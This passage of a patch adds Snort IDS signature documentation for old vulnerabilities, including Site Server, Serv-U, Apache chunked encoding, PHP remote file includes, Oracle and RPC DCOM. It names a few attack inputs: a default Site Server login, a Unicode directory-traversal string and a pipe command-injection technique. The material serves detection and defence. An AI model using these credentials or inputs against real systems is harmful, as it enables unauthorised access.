+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1817.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1817
+
+--
+Summary:
+This event is generated when an attempt is made to log on to Microsoft Site Server with a default account. 
+
+--
+Impact:
+Information gathering.  This attack may permit leaking of information associated with particular Site Server files.
+
+--
+Detailed Information:
+Microsoft Site Server is software for Windows NT servers that allows users to publish, find, and share information.  There is a vulnerability that allows leaking of information of some Site Server files when an attacker logs on with the username of 'LDAP_AnonymousUser' and a password of 'LdapPassword_1'.
+
+--
+Affected Systems:
+
+Microsoft Site Server 3.0 
+
+--
+Attack Scenarios:
+An attacker can log on to Site Server using a default username and password to view Site Server files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply Service Pack 4.
+
+
+--
+Contributors:
+Original rute writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11018
+
+--
--- /dev/null
+++ b/doc/signatures/2291.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2291
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1367.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 1367
+
+-- 
+Summary: 
+This event is generated when execution of a "mail" command is attempted via HTTP.
+
+-- 
+Impact: 
+Possible intelligence gathering. This may be an attempt to gain information using mail to access sensitive files on a webserver.
+
+-- 
+Detailed Information: 
+This may be an attempt to gain intelligence from sensitive system files on a webserver. This rule generates an event when a "mail" command followed by a space is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. 
+
+The "mail" command is used to read and send email on UNIX systems. The rule looks for the "mail" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "mail" command in the URL indicates that an attacker attempted to trick the web server into executing a system command in non-interactive mode i.e. without a valid shell session. 
+
+This rule may also generate an event if it detects this command in an unencrypted HTTP tunneling connection to the server or a shell connection through an exploit of the web server.
+
+-- 
+Attack Scenarios: 
+The attacker can make a standard HTTP request that contains the path to the "mail" command in the URI, which can then return requested files to an external destination.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+False Positives: 
+This event may be generated if "mail" followed by a space is present in a URI. For example, http://www.foo.com/mail /file.html
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Webservers should not be allowed to view or execute files and binaries outside of its designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine. 
+
+Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1808.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1808
+
+--
+Summary:
+An attacker is using exploit code for the Apache chunked encoding 
+vulnerability against your web server.
+
+--
+Impact:
+If successful, this exploit can allow attackers to cause code of their 
+choice to run on your server or cause
+a denial of service.
+
+--
+Detailed Information:
+Older versions of the Apache HTTP server suffered from a bug in the 
+routines that handled chunked encoding.
+This exploit takes advantage of this vulnerability.
+
+--
+Affected Systems:
+Version of Apache 1.3 up to and including 1.3.24 and versions of Apache 
+2.0 up to 2.0.36. All versions of Apache 1.2 are vulnerable.   Although 
+this vulnerability is present in all ports of Apache, the exploit code 
+detected by this signature appears to only work against systems running 
+BSD.
+
+--
+Attack Scenarios:
+An attacker can take advantage of a widely available exploit script to compromise the server.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This signature detects specific exploit code that targets systems 
+running BSD. It is certainly possible for this vulnerability to be 
+exploited in ways other than those detected by this signature.
+
+--
+Corrective Action:
+Ensure that you are running a version of Apache newer than those listed 
+in the "affected systems" section.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Apache http server project
+http://httpd.apache.org/info/security_bulletin_20020620.txt
+
+--
--- /dev/null
+++ b/doc/signatures/309.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 309
+
+--
+Summary:
+This event is generated when an attempt to overflow the buffer of a UNIX or Linux system via Sniffit is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Sniffit is a network monitoring tool that can also be configured to log emails. If this is the case, some versions of the tool contain a vulnerability such that a stack overflow via this logging mechanism is possible by a remote attacker.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+Use alternate tools such as Snort.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0306
+
+Bugtraq:
+http://www.securityfocus.com/bid/2353
+
+--
--- /dev/null
+++ b/doc/signatures/100000755.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000755
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "features.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "features.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/581.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+581
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) pcnfsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port pcnfsd is using.  Attackers can also learn what versions of the pcnfsd protocol are accepted by pcnfsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as pcnfsd run.  The pcnfsd RPC service handles printing and authentication over the network.  A vulnerability exists because of improper argument checking that allows execution of arbitrary commands with root privileges. 
+
+--
+Affected Systems:
+BSDI BSD/OS 2.1
+HP HP-UX 10.1, 10.10, 10.20, 11.0
+IBM AIX 3.2, 4.0, 4.1, 4.2
+SCO Open Server 5.0
+SCO Unixware 2.0, 2.0.3, 2.1
+SGI IRIX 6.5, 6.5.1 - 6.5.16 
+Sun Solaris 2.4, 2.5
+Sun SunOS 4.1, 4.1.1 - 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where pcnfsd runs.  This may be a precursor to accessing pcnfsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access pcnfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for pcnfsd, not probes of the pcnfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the pcnfsd service itself. An attacker may attempt to go directly to the pcnfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/5378
+
+CERT
+http://www.cert.org/advisories/CA-1996-08.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS22
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000733.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000733
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MTBlackList.Examine.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MTBlackList.Examine.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1934.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command FOLD.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by 
+sending data where a line feed character should occur to a POP server 
+via the FOLD command.
+
+The FOLD command allows the user to specify a mail folder to select.  By
+specifying a very large argument, the user can exploit the buffer overflow
+condition.
+
+--
+Affected Systems
+	POP Servers
+
+--
+Attack Scenarios:
+Simple. An attacker can supply specially crafted packets to a POP server
+via the FOLD function. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky Macatee <ricky.macatee@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/360.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+360
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in Serv-U FTP from CatSoft.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+Serv-U FTP from CatSoft is an FTP server for Windows 2000, NT and 9x systems.
+
+An attacker can download and upload files on the same partition as the ftp root. The attacker can use a standard user account with write and read access to a home folder.
+
+The vulnerability appears in Catsoft Serv-U FTP Server version 2.5a-h. A Unicode support implementation error was made, which allows an attacker to submit %20..%20.. to receive a "..", which allows an attacker to traverse the directory structure of the server. 
+
+--
+Affected Systems:
+CatSoft Serv-U 2.4
+CatSoft Serv-U 2.5
+Note: CatSoft Serv-U 2.5i is not affected.
+
+--
+Attack Scenarios:
+Any standard user can break into the system root and access any file. An attacker could also guess a login and weak password, login and use the directory traversal to gain the Serv-U FTP Server's configuration file. The configuration file can be modified to give "execute" rights, uploaded using %20. directory traversal and trojans can be installed.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check FTP log files for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2980.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+532
+
+--
+Summary:
+This event is generated when an attempt is made to access an administrative share on a Windows machine.
+
+--
+Impact:
+Serious. Possible administrator access on the victim machine. 
+
+--
+Detailed Information:
+This rule  generates an event when the hidden Netbios share Admin$, which is the Winnt directory, is accessed via SMB. 
+
+This is a poor security practice or an indication that a machine is being accessed remotely. 
+
+--
+Affected Systems:
+	Windows 9x
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenario:
+This can be accessed from GUI "map network drive" remotely 
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall to disallow Netbios access from the unprotected network.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jake Babbin 
+
+--
+References:
+
+arachnids 340 
+
+--
--- /dev/null
+++ b/doc/signatures/241.txt
@@ -0,0 +1,63 @@
+Rule:
+--
+Sid:
+241
+
+--
+Summary:
+This event is generated when a DDoS Shaft handler agent launchs a SYN flood against a target. 
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft agent.  If the listed destination IP is in your network, your host may be a target of a DDoS SYN flood. 
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Agents are hosts that are directed to launch attacks.  One type of attack that may be launched is a SYN flood of a target.  The SYN packets have a telltale initial sequence number of 674711609. 
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft agent may attack a target using a SYN flood. 
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+It is possible that an innocuous SYN packet will have a sequence number of 674711609.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS253
+
+Miscellaneous:
+http://biocserver.cwru.edu/~jose/shaft_analysis/
+
+
+--
--- /dev/null
+++ b/doc/signatures/2413.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2413
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the handling of ISAKMP data and SA keys.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+The Internet Security Association and Key Management Protocol (ISAKMP) 
+is used as a framework for an authentication method between peers using 
+secure keys.
+
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+--
+Affected Systems:
+	Kame Racoon
+
+--
+Attack Scenarios:
+The attacker may attempt to delete keys and security associations in
+hosts running the KAME IKE Daemon.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
--- /dev/null
+++ b/doc/signatures/100000810.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000810
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPBB" application running on a webserver. Access to the file "download.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "download.php" script used by the "PHPBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2732.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2732
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_update_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/119-7.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+119-7
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects
+Unicode encoded web requests. This may be an indicator of an obfuscated
+attack against a server as well as an attempt to evade an IDS.
+
+The Unicode map for the target servers can be generated for specific
+servers. Refer to the documentation for http_inspect for instructions.
+
+--
+Affected Systems:
+	Microsoft IIS web servers.
+
+--
+Attack Scenarios: 
+The attacker merely needs to encode a request using Unicode characters.
+
+--
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/2211.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2211
+
+--
+Summary:
+This event is generated when an attempt is made to access guestserver.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Lars Ellingsen's Guestbook system.
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+Lars Ellingsen's Guestbook system is a CGI application for web-based guestbooks. It contains a parsing vulnerability in guestserver.cgi where an attacker can place executable code within pipe characters (|) in front of an email address in the email value of a guestbook form. Because the pipe metacharacter is not properly filtered, code placed in the email value is executed with the security context of the web server.
+
+--
+Affected Systems:
+Any web server running Lars Ellingsen's Guestbook system.
+
+--
+Attack Scenarios:
+An attacker prepends shell commands between pipe characters to an email address in the email value of a guestbook entry. When the form data is submitted, the web server attempts to execute the commands. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses guestserver.cgi on an internal web server, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Because Lars Ellingsen's guestbook system does not appear to be currently maintained, you may want to use a different guestbook application. As a workaround, you can change the 1 that appears on the line beneath <-guestbook.mailto_guest-> to 0 in the guestbook.config file.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1748.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1748
+
+--
+Summary:
+This event is generated when an attempt is made to send an overly long 
+FTP command, possibly with the intent to cause of denial of service or 
+buffer overflow in the 3CDaemon FTP server.
+
+--
+Impact:
+Attempted remote access or denial of service.  Successful execution of 
+this attack can cause a denial of service or buffer overflow, allowing 
+the execution of arbitrary commands on the vulnerable FTP server.
+
+--
+Detailed Information:
+3CDaemon is an FTP server for Windows hosts.  A buffer overflow 
+vulnerability exists in 3CDaemon revision 10.  The exploit is caused by 
+sending an FTP command that is 400 bytes or longer, causing the server 
+to crash or permitting a buffer overflow that may allow the execution of
+arbitrary commands with the privileges of the process running the FTP 
+server.  This attack does not require login access to the FTP server.
+
+--
+Affected Systems:
+
+	3Com 3CDaemon 2.0 revision 10
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit this vulnerability by sending and 
+overly long FTP command, permitting the execution of arbitrary commands 
+or causing a denial of service against the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available. 
+
+--
+False Positives:
+This rule may generate an event if an FTP client provides a legitimate 
+request which is over 100 characters long. For example, when FTP clients
+store or request files with full path located in deep directory 
+hierarchies the full request might result in a filename that exceedes 95
+characters.
+
+This rule may also generate an event if Kerberos authentication is used
+for the FTP server.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4638
+
+--
--- /dev/null
+++ b/doc/signatures/1475.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1475
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3432.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3432
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2752.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2752
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
